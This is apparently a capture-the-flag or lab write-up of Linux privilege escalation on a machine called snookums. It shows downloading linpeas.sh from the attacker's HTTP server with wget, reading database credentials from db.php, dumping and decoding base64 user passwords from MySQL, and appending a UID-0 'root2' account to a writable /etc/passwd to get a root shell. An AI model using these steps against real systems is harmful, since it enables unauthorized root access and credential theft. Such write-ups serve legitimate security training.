privilege escalation [Got-MySQL]

linpeas.sh result:

I will use port 21 to transfer file as this the port which is allowed to communicate with outsite world that is kali linux in our case.

python3 -m http.server 21 -d /usr/share/peass/linpeas/

# In victim machine
wget http://192.168.45.233:21/linpeas.sh

Reading db.php file content

This files reveals the password of root user.

bash-4.2$ cat /var/www/html/db.php
cat /var/www/html/db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>

Using this i got the connection to MySql server.

mysql -u root -p'MalapropDoffUtilize1337'

Now, I will enumerate the data in MySQL.


mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| SimplePHPGal       |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.01 sec)

mysql> use SimplePHPGal
use SimplePHPGal
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+----------+----------------------------------------------+
| username | password                                     |
+----------+----------------------------------------------+
| josh     | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael  | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==     |
| serena   | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==     |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)

Found password for michael. which is one of the user.

The password is encypted. So, Let's decrypt it using cyberchef.

All password:

josh: MobilizeHissSeedtime747
michael: HockSydneyCertify123
serena: OverallCrestLean000

I tried these password on root as well but no output.

Now switch to michael user.

bash-4.2$ su michael
su michael
Password: HockSydneyCertify123

On looking at the /etc/passwd, I found that it is written by current user that is michael.

Exploiting this.

# make sure you do this steps in the vulnerable system (target system)
# Generate a password hash:

[michael@snookums temp]$ openssl passwd root
openssl passwd root
KcThJmp2oiG4Q


# Add a new user with root privileges:
[michael@snookums temp]$ echo "root2:KcThJmp2oiG4Q:0:0:root:/root:/bin/bash" >> /etc/passwd


# Switch to the new root user:
su root2

Got root shell.

Previoushttp [Initial Access]Nextproof.txt and local.txt

Last updated 1 year ago

Was this helpful?

hashtagReading db.php file content

Reading db.php file content